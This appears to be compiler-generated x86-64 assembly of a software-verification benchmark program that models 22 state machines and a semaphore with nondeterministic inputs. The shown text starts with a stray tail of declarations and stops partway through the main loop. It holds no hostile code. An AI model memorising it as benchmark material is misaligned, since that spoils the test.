.comm __x_sm2_state,1,0 ; @_x_sm2_state
.comm __x_sm3_l,4,2 ; @_x_sm3_l
.comm __x_sm0_state,1,0 ; @_x_sm0_state
.comm __x_sm1_state,1,0 ; @_x_sm1_state
.comm __x_sm1_l,4,2 ; @_x_sm1_l
.comm __x_sm5_l,4,2 ; @_x_sm5_l
.comm __x_sm4_l,4,2 ; @_x_sm4_l
.comm __x_sm2_loop_len,4,2 ; @_x_sm2_loop_len
.comm __x_sm9_state,1,0 ; @_x_sm9_state
.comm __x_sm9_l,4,2 ; @_x_sm9_l
.comm __x_sm3_loop_len,4,2 ; @_x_sm3_loop_len
.comm __x_sm10_state,1,0 ; @_x_sm10_state
.comm __x_sm18_state,1,0 ; @_x_sm18_state
.comm __x_sm11_loop_len,4,2 ; @_x_sm11_loop_len
.comm __x_sm10_l,4,2 ; @_x_sm10_l
.comm __x_sm4_loop_len,4,2 ; @_x_sm4_loop_len
.comm __x_sm11_state,1,0 ; @_x_sm11_state
.comm __x_sm19_state,1,0 ; @_x_sm19_state
.comm __x_sm12_loop_len,4,2 ; @_x_sm12_loop_len
.comm __x_sm11_l,4,2 ; @_x_sm11_l
.comm __x_sm5_loop_len,4,2 ; @_x_sm5_loop_len
.comm __x_sm12_state,1,0 ; @_x_sm12_state
.comm __x_sm20_state,1,0 ; @_x_sm20_state
.comm __x_sm13_loop_len,4,2 ; @_x_sm13_loop_len
.comm __x_sm12_l,4,2 ; @_x_sm12_l
.comm __x_sm6_loop_len,4,2 ; @_x_sm6_loop_len
.comm __x_sm13_state,1,0 ; @_x_sm13_state
.comm __x_sm21_state,1,0 ; @_x_sm21_state
.comm __x_sm14_loop_len,4,2 ; @_x_sm14_loop_len
.comm __x_sm13_l,4,2 ; @_x_sm13_l
.comm __x_sm7_loop_len,4,2 ; @_x_sm7_loop_len
.comm __x_sm14_state,1,0 ; @_x_sm14_state
.comm __x_sm15_loop_len,4,2 ; @_x_sm15_loop_len
.comm __x_sm14_l,4,2 ; @_x_sm14_l
.comm __x_sm8_loop_len,4,2 ; @_x_sm8_loop_len
.comm __x_sm15_state,1,0 ; @_x_sm15_state
.comm __x_sm16_loop_len,4,2 ; @_x_sm16_loop_len
.comm __x_sm15_l,4,2 ; @_x_sm15_l
.comm __x_sm9_loop_len,4,2 ; @_x_sm9_loop_len
.comm __x_sm16_state,1,0 ; @_x_sm16_state
.comm __x_sm17_loop_len,4,2 ; @_x_sm17_loop_len
.comm __x_semaphore,4,2 ; @_x_semaphore
.comm __x_sm16_l,4,2 ; @_x_sm16_l
.comm __x_sm10_loop_len,4,2 ; @_x_sm10_loop_len
.comm __x_sm17_state,1,0 ; @_x_sm17_state
.comm __x_sm18_loop_len,4,2 ; @_x_sm18_loop_len
.comm __x_sm17_l,4,2 ; @_x_sm17_l
.comm __x_sm18_l,4,2 ; @_x_sm18_l
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_nondet_bool ## -- Begin function __VERIFIER_nondet_bool
.p2align 4, 0x90
___VERIFIER_nondet_bool: ## @__VERIFIER_nondet_bool
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
callq ___VERIFIER_nondet_int
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
## kill: def $al killed $al killed $eax
movsbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm21_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm21_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm20_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm20_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm19_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm19_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm7_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm6_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm8_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm4_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm3_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm6_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm7_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm5_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _run@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm2_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm0_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm0_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm8_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm1_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm2_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm3_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm0_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm1_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm1_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm5_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm4_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm2_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm9_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm9_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm3_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm10_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm18_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm11_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm10_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm4_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm11_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm19_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm12_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm11_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm5_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm12_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm20_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm13_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm12_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm6_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm13_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm21_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm14_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm13_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm7_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm14_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm15_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm14_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm8_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm15_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm16_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm15_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm9_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm16_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm17_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _semaphore@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm16_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm10_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq _sm17_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm18_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm17_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq _sm18_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _semaphore@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.1:
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.2:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm0_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.3:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm0_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.4:
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.5:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm1_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.6:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm1_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.7:
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.8:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm2_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.9:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm2_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.10:
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.11:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm3_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.12:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm3_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.13:
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.14:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm4_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.15:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm4_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.16:
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.17:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm5_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.18:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm5_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.19:
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.20:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm6_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.21:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm6_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.22:
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.23:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm7_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.24:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm7_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.25:
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.26:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm8_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.27:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm8_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.28:
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.29:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm9_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.30:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm9_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.31:
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.32:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm10_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.33:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm10_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.34:
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.35:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm11_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.36:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm11_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.37:
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.38:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm12_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.39:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm12_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.40:
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.41:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm13_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.42:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm13_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.43:
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.44:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm14_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.45:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm14_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.46:
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.47:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm15_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.48:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm15_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.49:
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.50:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm16_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.51:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm16_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.52:
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.53:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm17_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.54:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm17_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.55:
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.56:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm18_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.57:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm18_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.58:
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.59:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm19_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.60:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm19_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.61:
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -9(%rbp) ## 1-byte Spill
je LBB1_69
## %bb.62:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm20_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jle LBB1_69
## %bb.63:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm20_l@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -9(%rbp) ## 1-byte Spill
jne LBB1_69
## %bb.64:
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -10(%rbp) ## 1-byte Spill
je LBB1_68
## %bb.65:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm21_loop_len@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -11(%rbp) ## 1-byte Spill
jle LBB1_67
## %bb.66:
movq _sm21_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
sete %al
movb %al, -11(%rbp) ## 1-byte Spill
LBB1_67:
movb -11(%rbp), %al ## 1-byte Reload
movb %al, -10(%rbp) ## 1-byte Spill
LBB1_68:
movb -10(%rbp), %al ## 1-byte Reload
movb %al, -9(%rbp) ## 1-byte Spill
LBB1_69:
movb -9(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movl %eax, -8(%rbp)
LBB1_70: ## =>This Inner Loop Header: Depth=1
cmpl $0, -8(%rbp)
je LBB1_694
## %bb.71: ## in Loop: Header=BB1_70 Depth=1
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm21_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm21_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm20_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm20_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm19_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm19_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm7_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm6_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm8_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm4_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm3_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
